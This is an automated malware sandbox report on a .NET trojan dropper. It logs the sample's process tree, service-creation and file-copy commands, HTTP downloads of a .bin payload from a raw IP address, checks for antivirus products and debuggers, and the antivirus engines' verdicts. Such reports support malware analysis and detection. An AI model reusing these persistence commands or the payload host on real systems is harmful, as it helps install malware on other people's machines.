Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 28, 2022, 6:03 p.m.	March 28, 2022, 6:16 p.m.

Size	54.3KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`2f7c50f565827dabe6a94d3a16f4b214`
SHA256	`85e439e13bcd714b966c6f4cea0cedf513944ca13523c7b0c4448fdebc240be2`
CRC32	`8FEBC0E6`
ssdeep	`1536:EMlbXzdz2TahTs4a9Nw8acgGKj5NsmCAE:EMlbXzdzdFW9NwN/DsmCt`
Yara	Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature IsPE32 - (no description)

477_1648224166_8462.exe "C:\Users\test22\AppData\Local\Temp\477_1648224166_8462.exe"
2768
- PING.EXE "ping.exe" 5.4.3.1
  2924
- interlock_storage_8_57.exe "C:\Users\test22\AppData\Local\Temp\\interlock_storage_8_57.exe"
  1992
  - PING.EXE "C:\Windows\System32\PING.EXE" 22.61.56.108 -n 4
    2192
  - cmd.exe "C:\Windows\System32\cmd.exe" /C copy "C:\Users\test22\AppData\Local\Temp\interlock_storage_8_57.exe" "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe"
    2548
  - sc.exe "C:\Windows\System32\sc.exe" create SecureElementDataSrv binpath= "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe delected"
    2656
  - sc.exe "C:\Windows\System32\sc.exe" start SecureElementDataSrv
    2808
  - sc.exe "C:\Windows\System32\sc.exe" stop SecureElementDataSrv
    2984

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
22.61.56.108	Active	Moloch
5.4.3.1	Active	Moloch
93.115.21.45	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2024420	ET HUNTING Request for .bin with BITS/ User-Agent	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2024420	ET HUNTING Request for .bin with BITS/ User-Agent	Potentially Bad Traffic
TCP 93.115.21.45:80 -> 192.168.56.101:49172	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 93.115.21.45:80 -> 192.168.56.101:49172	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2024420	ET HUNTING Request for .bin with BITS/ User-Agent	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2024420	ET HUNTING Request for .bin with BITS/ User-Agent	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 192.168.56.101:49172 -> 93.115.21.45:80	2024420	ET HUNTING Request for .bin with BITS/ User-Agent	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 28, 2022, 5:55 p.m.			0	0
IsDebuggerPresent March 28, 2022, 6:03 p.m.			0	0
IsDebuggerPresent March 28, 2022, 6:03 p.m.			0	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleA March 28, 2022, 6:03 p.m.	buffer: Pinging 22.61.56.108 console_handle: 0x00000007	1	1
WriteConsoleA March 28, 2022, 6:03 p.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA March 28, 2022, 6:03 p.m.	buffer: Request timed out. console_handle: 0x00000007	1	1
WriteConsoleA March 28, 2022, 6:03 p.m.	buffer: Request timed out. console_handle: 0x00000007	1	1
WriteConsoleA March 28, 2022, 6:03 p.m.	buffer: Request timed out. console_handle: 0x00000007	1	1
WriteConsoleA March 28, 2022, 6:03 p.m.	buffer: Request timed out. console_handle: 0x00000007	1	1
WriteConsoleA March 28, 2022, 6:03 p.m.	buffer: Ping statistics for 22.61.56.108: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2022, 6:03 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2022, 6:03 p.m.	buffer: [SC] CreateService SUCCESS console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2022, 6:04 p.m.	buffer: [SC] StartService FAILED 1053: The service did not respond to the start or control request in a timely fashion. console_handle: 0x00000007	1	1
WriteConsoleW March 28, 2022, 6:04 p.m.	buffer: [SC] ControlService FAILED 1062: The service has not been started. console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 28, 2022, 5:55 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://93.115.21.45/gtaddress
suspicious_features	Connection to IP address	suspicious_request	HEAD http://93.115.21.45/scripts/test2.bin
suspicious_features	Connection to IP address	suspicious_request	GET http://93.115.21.45/scripts/test2.bin

Performs some HTTP requests (3 events)

request	GET http://93.115.21.45/gtaddress
request	HEAD http://93.115.21.45/scripts/test2.bin
request	GET http://93.115.21.45/scripts/test2.bin

Allocates read-write-execute memory (usually to unpack itself) (50 out of 59 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000720000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef40a1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4320000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4320000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4320000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4320000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4320000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef431e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0002c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:55 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0002a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:56 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00161000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:56 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:56 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0003f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:56 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00074000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 5:56 p.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 28, 2022, 6:03 p.m.	process_identifier: 1992 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00580000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2022, 6:03 p.m.	process_identifier: 1992 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 28, 2022, 6:03 p.m.	process_identifier: 1992 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 28, 2022, 6:03 p.m.	process_identifier: 1992 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 28, 2022, 6:03 p.m.	process_identifier: 1992 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\interlock_storage_8_57.exe

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW March 28, 2022, 6:03 p.m.	service_start_name: start_type: 3 password: display_name: filepath: C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe delected service_name: SecureElementDataSrv filepath_r: C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe delected desired_access: 983551 service_handle: 0x0034b718 error_control: 1 service_type: 16 service_manager_handle: 0x0034b7b8	1	3454744	0

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /C copy "C:\Users\test22\AppData\Local\Temp\interlock_storage_8_57.exe" "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe"
cmdline	cmd.exe /C copy "C:\Users\test22\AppData\Local\Temp\interlock_storage_8_57.exe" "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\interlock_storage_8_57.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 28, 2022, 5:55 p.m.	thread_identifier: 2928 thread_handle: 0x0000000000000394 process_identifier: 2924 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "ping.exe" 5.4.3.1 filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000000000000398	1	1
CreateProcessInternalW March 28, 2022, 5:56 p.m.	thread_identifier: 788 thread_handle: 0x00000000000003b0 process_identifier: 1992 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\\interlock_storage_8_57.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000000000003ac	1	1
ShellExecuteExW March 28, 2022, 6:03 p.m.	show_type: 0 filepath_r: ping.exe parameters: 22.61.56.108 -n 4 filepath: ping.exe	1	1
ShellExecuteExW March 28, 2022, 6:03 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /C copy "C:\Users\test22\AppData\Local\Temp\interlock_storage_8_57.exe" "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe" filepath: cmd.exe	1	1
ShellExecuteExW March 28, 2022, 6:03 p.m.	show_type: 0 filepath_r: sc.exe parameters: create SecureElementDataSrv binpath= "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe delected" filepath: sc.exe	1	1
ShellExecuteExW March 28, 2022, 6:03 p.m.	show_type: 0 filepath_r: sc.exe parameters: start SecureElementDataSrv filepath: sc.exe	1	1
ShellExecuteExW March 28, 2022, 6:04 p.m.	show_type: 0 filepath_r: sc.exe parameters: stop SecureElementDataSrv filepath: sc.exe	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00009400', u'virtual_address': u'0x00006000', u'entropy': 7.971420026618429, u'name': u'.reloc', u'virtual_size': u'0x0000800c'}

entropy

7.97142002662

description

A section with a high entropy has been found

entropy

0.840909090909

description

Overall entropy of this PE file is high

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	sc.exe start SecureElementDataSrv
cmdline	"C:\Windows\System32\sc.exe" start SecureElementDataSrv
cmdline	ping.exe 22.61.56.108 -n 4
cmdline	"ping.exe" 5.4.3.1
cmdline	"C:\Windows\System32\PING.EXE" 22.61.56.108 -n 4
cmdline	sc.exe stop SecureElementDataSrv
cmdline	"C:\Windows\System32\sc.exe" stop SecureElementDataSrv
cmdline	"C:\Windows\System32\sc.exe" create SecureElementDataSrv binpath= "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe delected"
cmdline	sc.exe create SecureElementDataSrv binpath= "C:\Program Files (x86)\ExMultimediaStorage\min_id_resolver.exe delected"

Communicates with host for which no DNS query was performed (3 events)

host	22.61.56.108
host	5.4.3.1
host	93.115.21.45

Attempts to identify installed AV products by registry key (6 events)

registry	HKEY_LOCAL_MACHINE\Software\Avira
registry	HKEY_CURRENT_USER\Software\Avira
registry	HKEY_CURRENT_USER\Software\ESET
registry	HKEY_LOCAL_MACHINE\Software\ESET
registry	HKEY_LOCAL_MACHINE\Software\G Data
registry	HKEY_CURRENT_USER\Software\G Data

Attempts to stop active services (1 event)

Time & API	Arguments	Status	Return	Repeated
ControlService March 28, 2022, 6:04 p.m.	service_handle: 0x001fb610 service_name: SecureElementDataSrv control_code: 1		0	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob

Generates some ICMP traffic

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Lazy.158411
FireEye	Generic.mg.2f7c50f565827dab
ALYac	Gen:Variant.Lazy.158411
Malwarebytes	Malware.AI.2575088839
BitDefender	Gen:Variant.Lazy.158411
Cybereason	malicious.d2506a
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/TrojanDropper.Agent.FLG
APEX	Malicious
Kaspersky	HEUR:Trojan-Spy.MSIL.Stealer.gen
Ad-Aware	Gen:Variant.Lazy.158411
Sophos	Generic ML PUA (PUA)
DrWeb	Trojan.MulDrop19.64112
Trapmine	malicious.high.ml.score
Emsisoft	Gen:Variant.Lazy.158411 (B)
GData	Gen:Variant.Lazy.158411
Avira	TR/Drop.Agent.xdvoz
MAX	malware (ai score=84)
Antiy-AVL	Trojan/Generic.ASMalwS.354D80E
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.C5030768
Acronis	suspicious
SentinelOne	Static AI - Malicious PE
BitDefenderTheta	Gen:NN.ZemsilF.34294.dmY@ayqMF5k
AVG	Win32:SpywareX-gen [Trj]
Avast	Win32:SpywareX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

477_1648224166_8462.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All